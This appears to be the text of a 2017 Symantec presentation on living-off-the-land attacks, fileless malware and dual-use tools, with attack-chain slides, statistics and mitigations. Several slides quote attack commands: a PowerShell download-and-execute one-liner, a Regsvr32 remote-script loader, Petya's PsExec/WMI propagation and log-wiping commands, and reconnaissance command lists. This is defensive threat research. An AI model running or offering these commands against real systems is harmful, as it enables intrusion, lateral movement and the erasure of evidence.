Living off the land tactics involve attackers using only pre-installed software and tools on a system to carry out an attack without installing additional binaries. This allows attacks to be harder to detect and trace since it does not involve new files being placed on a system. Attackers make use of techniques like memory-only attacks, scripts hidden in locations like the registry rather than files, and abusing legitimate dual-use tools to blend in and carry out lateral movement, credential theft, and other objectives. Defending against these tactics requires advanced detection methods that can analyze behaviors rather than just files to identify potentially malicious activity and abuse of system tools.

1. Presenter Date
Living off the land
tactics, fileless attacks &
dual-use tools

2. 2Copyright © 2017 Symantec Corporation
Definition: Living off the land
Only pre-installed software is used by the
attacker and no additional binary executables
are installed onto the system
Living off the land
2

3. 3Copyright © 2017 Symantec Corporation
Attackers are using what’s already available to attack you
o Less new files on disk → more difficult to detect attack
o Use off-the-shelf tools & cloud services → difficult to determine intent & source
o These tools are ubiquitous → hide in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult
→ use simple and proven methods such as email & social engineering
Living off the land
3

4. 4Copyright © 2017 Symantec Corporation
Multiple fileless methods possible - not all are truly fileless:
«Fileless» attacks
e.g. remote code exploits such as EternalBlue and CodeRedMEMORY ONLY ATTACKS
FILELESS LOADPOINT
NON-PE FILES
DUAL-USE TOOLS
Documents with macros, PDFs with JavaScript
and scripts (VBS, JavaScript, PowerShell,…)
Hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
Using benign tools, such as PsExec, to do malicious things

5. 5Copyright © 2017 Symantec Corporation
Living off the land attack chain
Exploit in memory
e.g. SMB EternalBlue
Email with Non-PE file
e.g. document macro
Weak or stolen credentials
e.g. RDP password guess
INCURSION
Remote script dropper e.g. LNK
with PowerShell from cloud
1.
Memory only malware
e.g. SQL Slammer
Non-persistent
Persistent
PERSISTENCE
Fileless persistence loadpoint
e.g. JScript in registry
Regular non-fileless method
2.
PAYLOAD
Regular non-fileless payload
Non-PE file payload
e.g. PowerShell script
Memory only payload
e.g. Mirai DDoS
Dual-use tools
e.g. netsh or PsExec.exe
3.

6. 6Copyright © 2017 Symantec Corporation
Section
Memory only attacks
1

7. 7Copyright © 2017 Symantec Corporation
Run malicious code only in memory, does not write any files to disk
o Mainly remote code execution (RCE) exploits, like EternalBlue
o CodeRed in 2001 was the first widespread outbreak of this type
o A computer restart will clean/disinfect
o PowerShell can be used to load and execute payload in memory
Attackers do not always need persistence:
o Mirai bot – re-infects device through a restart if it gets cleaned
o Targeted attack groups – core systems do not get restarted often
Memory only attacks

8. 8Copyright © 2017 Symantec Corporation
Section
Dual-use tools
2

9. 9Copyright © 2017 Symantec Corporation
System tools and clean applications used for nefarious purposes
Some tools are pre-installed, some are downloaded by the attacker
Dual-use tools
Type of internal activity Purpose Dual-use tools
Internal network
reconnaissance
Enumerate information about a target
environment
net user, systeminfo, whoami,
hostname, quser, ipconfig
Credential harvesting
Obtain legitimate user credentials to gain
access to target systems for malicious
purposes
Mimikatz, WCE, pwdump
Lateral movement Gain deeper access into target network PsExec, PowerShell, WMI, RDP
Data exfiltration Send data back to attackers
FTP, RAR, ZIP, iExplorer, PuTTY,
PowerShell, rdpclip
Fallback backdoor
Enables a backdoor that can be used,
should the main backdoor be removed
net user, RDP, Telnet server

10. 10Copyright © 2017 Symantec Corporation
o Many attack groups use common system tools during their attacks
Information gathering
• systeminfo
• net view
• net view /domain
• tasklist /v
• gpresult /z
• arp -a
• net share
• net use
• net user administrator
• net user /domain
• net user administrator /domain
• tasklist /fi
WATERBUG/TURLA
• hostname
• whoami
• ver
• ipconfig -all
• ping www.google.com
• query user
• net user
• net view
• net view /domain
• tasklist /svc
• netstat -ano | find TCP
• msdtc [IP] [port]
APPLEWORM/LAZARUS
• net user
• ipconfig /all
• net start
• systeminfo
• gpresult
BILLBUG

11. 11Copyright © 2017 Symantec Corporation
Group name Reconnaissance Credential harvesting Lateral movement
Custom
built tools
Tick whoami, procdump, VBS WCE, Mimikatz, gsecdump PsExec Yes
Waterbug systeminfo, net, tasklist, gpresult,… WCE, pwdump Open shares Yes
Suckfly tcpscan, smbscan WCE, gsecdump, credentialdumper - Yes
Fritillary PowerShell, sdelete Mimikatz, PowerShell PsExec Yes
Destroyer Disk usage, event log viewer kerberos manipulator PsExec, curl, VNC Yes
Chafer network scanner, SMB bruteforcer WCE, Mimikatz, gsecdump,… PsExec Yes
Greenbug Broutlook WCE, gsecdump, browdump, … TeamViewer, PuTTY Yes
Buckeye os info, user info, smb enumerator,… pwdump, Lazagne, chromedump,… Open shares Yes
Billbug
ver, net, gpresult, systeminfo,
ipconfig, …
- custom backdoor Yes
Appleworm net, netsh, query, telnet, find, … dumping SAM RDP bruteforcer, rdclip Yes
Targeted attacks & dual-use tools

12. 12Copyright © 2017 Symantec Corporation
o 10 out of 10 of groups analyzed used system tools in combination
with custom tools during their attacks
o Application whitelisting often does not protect against such attacks
Examples:
o Petya used PsExec, WMI, and LSAdump for lateral movement
o Calcium/Fin7 group used PowerShell payloads in attacks in 2017
o Attack against DNC in 2016 used PowerShell for lateral movement
and discovery and used a WMI fileless persistence method
Targeted attack groups

13. 13Copyright © 2017 Symantec Corporation
o Mimikatz and PsExec are popular for lateral movement, e.g. Petya
Dual-use tools
Global
usage

14. 14Copyright © 2017 Symantec Corporation
Example: Ransom.Petya

15. 15Copyright © 2017 Symantec Corporation
o Threat is a DLL executed by rundll32.exe
o Uses recompiled version of LSADump Mimikatz to get passwords
o Uses PsExec to propagate
o [server_name]admin$perfc.dat
o psexec rundll32.exe c:windowsperfc.dat #1 <rand>
o Uses WMI to propagate if PsExec fails
o wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create
“%System%rundll32.exe “%Windows%perfc.dat" #1 60”
o Scheduled task to restart into the malicious MBR payload
o schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR “%system%shutdown14:42.exe /r /f" /ST
o Deletes log files to hide traces
o wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
Petya uses dual-use tools

16. 16Copyright © 2017 Symantec Corporation
The Odinaff group used multiple dual-use tools in their attack
o Mimikatz: An open source password recovery tool
o PsExec: A process execution tool from Microsoft
o Netscan: A network scanning tool
o Ammyy Admin: A remote access tool
o Gussdoor: A custom remote backdoor (Backdoor.Gussdoor)
o RunAs: A tool for running processes as another user
o PowerShell: Various commands used
Example: Odinaff group

17. 17Copyright © 2017 Symantec Corporation
o On average 2% of malware in our sandbox misused WMI
WMI usage in malware

18. 18Copyright © 2017 Symantec Corporation
Usage of dual-use tools - January 2017
Tool Usage count
sc.exe 2.7190%
vnc 2.1176%
net.exe 1.2733%
powershell.exe 1.0263%
ipconfig.exe 0.8227%
netsh.exe 0.7526%
teamviewer.exe 0.6224%
tasklist.exe 0.4963%
rdpclip.exe 0.3226%
rar.exe 0.3139%
Tool Usage count
wmic.exe 0.3027%
find.exe 0.2767%
curl.exe 0.2027%
netstat.exe 0.1938%
systeminfo.exe 0.1641%
wget.exe 0.1208%
nc.exe 0.1174%
gpresult.exe 0.1147%
whoami.exe 0.1109%
ammyy.exe 0.1061%
o System tools are popular with administrators and cyber criminals
o Remote administration tools are often misused by attackers

19. 19Copyright © 2017 Symantec Corporation
o PowerShell is still gaining popularity with attackers
Usage of dual-use tools

20. 20Copyright © 2017 Symantec Corporation
Section
Non-PE files
PE = Portable Executables
3

21. 21Copyright © 2017 Symantec Corporation
Malicious macro
with social engineering
Malcious documents still popular
21
Embedded binary
can be double
clicked

22. 22Copyright © 2017 Symantec Corporation
o Scripts are very popular, especially PowerShell
o Many script toolkits available
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be quickly adapted if needed
Non-PE files
powershell.exe -nop -ep Bypass -noexit -c
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true};
iex ((New-Object System.Net.WebClient).DownloadString(‘[REMOVED]’))
Example PowerShell downloader

23. 23Copyright © 2017 Symantec Corporation
Common malware use cases for
PowerShell
23
PowerShell script used to
download payload to disk
or memory
Often used in email
attachments such as WSF
or document macros
DOWNLOADER
PowerShell script used as
persistent loadpoint on
Windows
Often stored completely in
registry (fileless) e.g.
Kotver or within WMI
LOADPOINT
PowerShell script remoting
to execute on remote
computer (Invoke-
Command)
Download and execute
Mimikatz, etc. in order to
steal credentials
LATERAL MOVEMENT

24. 24Copyright © 2017 Symantec Corporation
Email script downloaders
24
Detections by month for JavaScript and macro downloaders

25. 25Copyright © 2017 Symantec Corporation
o Malicious attachments with HTML code gained popularity in 2017
Attachment file extensions

26. 26Copyright © 2017 Symantec Corporation
Prevalence of PowerShell
o 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious
26
Volume of PowerShell samples from customers in our sandbox in
2016
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader
TOP 3 THREATS THAT USE POWERSHELL

27. 27Copyright © 2017 Symantec Corporation
Section
Fileless loadpoints
4

28. 28Copyright © 2017 Symantec Corporation
There are many ways to have a loadpoint without adding a new file:
o Windows registry
o Windows Management Instrumentation (WMI)
o Group Policies Objects (GPO)
o Scheduled task
o …
Fileless loadpoints

29. 29Copyright © 2017 Symantec Corporation
Common: Windows registry run key that points to the malware binary file
New trick: Windows registry run key contains a script that will get executed
o This script can load more payloads from other registry keys and run them
o As the script is not in a file on disk it might be missed by traditional security tools
Script embedded in the registry

30. 30Copyright © 2017 Symantec Corporation
o Multiple stages in registry
o Uses JavaScript and PowerShell
o Loads DLL directly into memory
o Decrypted directly in memory
o Uses non printable ASCII character
to protect own registry key
Example: Poweliks

31. 31Copyright © 2017 Symantec Corporation
o Registry run key can also point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript
Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll
Example: Downloder.Dromedan (40,000 detections / day)
o Embedded JScript uses WMI to execute a PowerShell payload
o Script stores encoded DLL in the registry for later
Remote SCT load
Malicious.sct file

32. 32Copyright © 2017 Symantec Corporation
Similar trigger methods exist for:
o Windows Management Instrumentation (WMI)
o Group Policies Objects (GPO)
o Scheduled task
Fileless loadpoints
WMI PowerShell backdoor

33. 33Copyright © 2017 Symantec Corporation
Without additional files, but writing to existing files
o File infector Infect any file that gets restarted with the PC
o Browser files Infect the core browser files or extensions
o PowerShell profile Add malicious script to profile file
o Trigger on shutdown Remove itself once started and write
registry run key when system shutdown is called
o BITSadmin Add a malicious update server as backdoor
Not truly fileless loadpoints

34. 34Copyright © 2017 Symantec Corporation
If no file is written to disk → security measures might not work
Lack of indicators of compromise (IoCs) for sharing
Common malware does not always use a loadpoint anymore
Symantec has various detection features in place for such threats
Detection challenges

35. 35Copyright © 2017 Symantec Corporation
o Monitor the use of dual-use tools inside your network
o Block remote execution through PsExec and WMI (if applicable)
o Enable better logging and process the information (if applicable)
o Enable advanced account security features, like 2FA and login
notification (if applicable)
o Protect against password and credential theft, for example, with
behavior based security solutions
Mitigation & best practices

36. 36Copyright © 2017 Symantec Corporation
• Deepsight IoC feeds
• MATI custom reports
• Threat Intelligence
• Managed Security Services
(MSS)
• Incident Response (IR)
on site
• Data Loss Prevention (DLP)
• …
• Proxy SG secure web
gateway
• Security Analytics
• Web Security Service
• Data Center Security (DCS)
• Control Compliance Suite
(CCS)
…
Protection solutions
Symantec Endpoint Protection
(SEP) 14
Reputation, machine learning,
behavior detection, emulation,
exploit mitigation, IPS, …
• Public awareness/white papers
• Law enforcement collaboration
• Infrastructure takedowns
• …
• Email Security.cloud
• MAA Sandbox
• Advanced Threat Protection
(ATP)
• …
Attacker
Organization
Users

37. 37Copyright © 2017 Symantec Corporation
Advanced Antivirus Engine
o Symantec uses an array of detection engines including an advanced
signature-based antivirus engine with heuristics, just-in-time (JIT) memory-
scanning, emulator and advanced machine-learning engines. This allows
for the detection of directly in-memory executed fileless threats.
SONAR Behavior Engine
o SONAR is Symantec’s real-time behavior-based protection that blocks
potentially malicious applications from running on the computer. It detects
malware without requiring any specific detection signatures. SONAR uses
heuristics, reputation data, and behavioral policies to detect emerging and
unknown threats.
Email Protection
o Email-filtering services such as Symantec Email Security.cloud can block
malicious emails before they reach users. Symantec Messaging Gateway’s
Disarm Technology can also protect by removing malicious content before
they even reach the user.
Malware Analysis Sandbox
o Sandboxes such as Blue Coat Malware Analysis have the capability to
analyze and block malicious scripts including PowerShell scripts.
The technology can overcome multiple layers of obfuscation to detect
deeply hidden suspicious behavior.
Network Protection
o Symantec’s Secure Web Gateway and IPS and firewall on the endpoint can
monitor and block malicious traffic entering or leaving a system and can
help minimizing impacts of attacks. Suspicious content can be
automatically analyzed on sandboxes.
System Hardening
o Symantec’s system hardening solution, Symantec Data Center Security,
can secure physical and virtual servers, and monitor the compliance
posture of server systems for on-premise, public, and private cloud data
centers. By defining allowed behavior, Symantec Data Center Security can
limit the use of scripts and any of their actions.
Visibility and Services
o Symantec’s Managed Security Services can help with threat intelligtence,
with proactive threat hunting, as well as incident response handling.
Symantec: Robust protection against fileless threats
37

38. 38Copyright © 2017 Symantec Corporation
o Nearly all targeted attack groups use system tools in their attacks
o Sandboxes are often not able to handle fileless attacks properly
o Fileless attacks are difficult to detect as they leave less traces
o Application whitelisting will not protect against all living off the land
tactics
o Script attacks, especially PowerShell, are increasing
Conclusion

39. 39Copyright © 2017 Symantec Corporation
o BLOG: Attackers are increasingly living off the land
o WHITEPAPER: Living off the land and fileless attack techniques
Further reading

40. 40Copyright © 2017 Symantec Corporation 40Copyright © 2017 Symantec Corporation
Thank you